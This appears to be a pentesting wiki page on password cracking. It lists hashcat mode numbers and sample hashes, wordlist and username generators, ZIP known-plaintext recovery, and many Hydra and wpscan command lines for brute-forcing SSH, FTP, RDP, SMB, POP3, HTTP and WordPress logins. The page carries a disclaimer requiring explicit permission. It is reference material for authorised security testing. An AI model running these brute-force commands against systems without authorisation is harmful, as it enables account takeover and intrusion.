Password cracking
Password cracking
Identify hash
# https://github.com/noraj/haiti
haiti [hash]Dictionary creation
# Pydictor
# https://www.github.com/landgrey/pydictor.git
pydictor.py -extend TERM --leet 0 1 2 11 21 --len 4 20
# Username generator
# https://github.com/benbusby/namebuster
namebuster https://example.com
namebuster "term1, term2"
https://app.wgen.io/
Examples
Options
jtr
Hashcat
Wiki
Hashes
Examples
Useful hashes
Linux Hashes - /etc/shadow
500
md5crypt $1$, MD5(Unix)
200
bcrypt $2*$, Blowfish(Unix)
400
sha256crypt $5$, SHA256(Unix)
1800
sha512crypt $6$, SHA512(Unix)
Windows Hashes
3000
LM
1000
NTLM
Common Hashes
900
MD4
Raw Hash
0
MD5
Raw Hash
5100
Half MD5
Raw Hash
100
SHA1
Raw Hash
10800
SHA-384
Raw Hash
1400
SHA-256
Raw Hash
1700
SHA-512
Raw Hash
Common Files with password
11600
7-Zip
12500
RAR3-hp
13000
RAR5
13200
AxCrypt
13300
AxCrypt in-memory SHA1
13600
WinZip
9700
MS Office <= 2003 $0/$1, MD5 + RC4
9710
MS Office <= 2003 $0/$1, MD5 + RC4, collider #1
9720
MS Office <= 2003 $0/$1, MD5 + RC4, collider #2
9800
MS Office <= 2003 $3/$4, SHA1 + RC4
9810
MS Office <= 2003 $3, SHA1 + RC4, collider #1
9820
MS Office <= 2003 $3, SHA1 + RC4, collider #2
9400
MS Office 2007
9500
MS Office 2010
9600
MS Office 2013
10400
PDF 1.1 - 1.3 (Acrobat 2 - 4)
10410
PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1
10420
PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2
10500
PDF 1.4 - 1.6 (Acrobat 5 - 8)
10600
PDF 1.7 Level 3 (Acrobat 9)
10700
PDF 1.7 Level 8 (Acrobat 10 - 11)
16200
Apple Secure Notes
Database Hashes
12
PostgreSQL
Database Server
a6343a68d964ca596d9752250d54bb8a:postgres
131
MSSQL (2000)
Database Server
0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
132
MSSQL (2005)
Database Server
0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
1731
MSSQL (2012, 2014)
Database Server
0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
200
MySQL323
Database Server
7196759210defdc0
300
MySQL4.1/MySQL5
Database Server
fcf7c1b8749cf99d88e5f34271d636178fb5d130
3100
Oracle H: Type (Oracle 7+)
Database Server
7A963A529D2E3229:3682427524
112
Oracle S: Type (Oracle 11+)
Database Server
ac5f1e62d21fd0529428b84d42e8955b04966703:38445748184477378130
12300
Oracle T: Type (Oracle 12+)
Database Server
78281A9C0CF626BD05EFC4F41B515B61D6C4D95A250CD4A605CA0EF97168D670EBCB5673B6F5A2FB9CC4E0C0101E659C0C4E3B9B3BEDA846CD15508E88685A2334141655046766111066420254008225
8000
Sybase ASE
Database Server
0xc00778168388631428230545ed2c976790af96768afa0806fe6c0da3b28f3e132137eac56f9bad027ea2
Kerberos Hashes
13100
Type 23
$krb5tgs$23$
19600
Type 17
$krb5tgs$17$
19700
Type 18
$krb5tgs$18$
18200
ASREP Type 23
$krb5asrep$23$
Files
Single characters
a-z
A-Z
Special characters
Password Cracking
Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Headings:
This page was getting to be long, so here are shortcuts to the major sections. I broke these out into separate pages for better organization and searchability.
Not all methods of discovering passwords involve directly "cracking" hashes. Brute forcing logins and direct recovery programs are also viable solutions.
Default Credentials
Search using your favorite web search engine for default credentials of the technology that is being used, or try the following compilation lists:
Wordlists
Password Recovery
Password recovery programs: https://www.passcape.com/products (TODO:Test these!)
ZIP Password Retrieval (with Known Plaintext)
Download pkcrack
https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack/download1.html
! Before using, it must be built from source
Syntax
Brute forcing logins
An amazing index of brute-force commands: https://book.hacktricks.xyz/brute-force
Hydra
Below are a few scriptable examples to brute force logins of common protocols.
hydra -P $pass_list -v $ip snmp -vV
SNMP: Brute force
hydra -t 1 -l $user -P $pass_list -vV $ip ftp
FTP: with known user, using password list
hydra -vV -u -L $users_list -P $pass_list -t 1 -u $ip ssh
SSH: using users list, and passwords list
hydra -vV -u -L $users_list -p $pass -t 1 -u $ip ssh
SSH: with a known password, and a username list
hydra -vV $ip -s $port ssh -l $user -P $pass_list
SSH: with known username on non-standard port
hydra -vV -l $user -P $pass_list -f $ip pop3
POP3: Brute Force
hydra -vV -L $users_list -P $pass_list $ip http-get $login_page
HTTP GET: with user list and pass list
hydra -vV -t 1 -f -l $user -P $pass_list rdp://$ip
Windows Remote Desktop: with known username, and pass list
hydra -vV -t 1 -f -l $user -P $pass_list $ip smb
SMB: brute force with known user, and pass list
hydra -vV -l $user -P $pass_list $ip http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
WordPress: brute force an admin login
hydra -vV -L $users_list -p $pass $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
WordPress: enumerate users
wpscan --url $url -U $user -P $pass_list
Use wpscan to brute force password with known user
Other useful Hydra options
-x min:max:charset - Generate passwords from min to max length. Charset can contain 1 for numbers, a for lowercase and A for uppercase characters. Any other character that is added is put in the list.
Example: 1:2:a1%. The generated passwords will be of length 1 to 2 and contain lowercase letters, numbers and/or percent signs and periods/dots.
-e nsr - Do additional checks. n for null password, s try login as pass, r try the reverse login as pass
crackmapexec
https://mpgn.gitbook.io/crackmapexec/
Resources
Last updated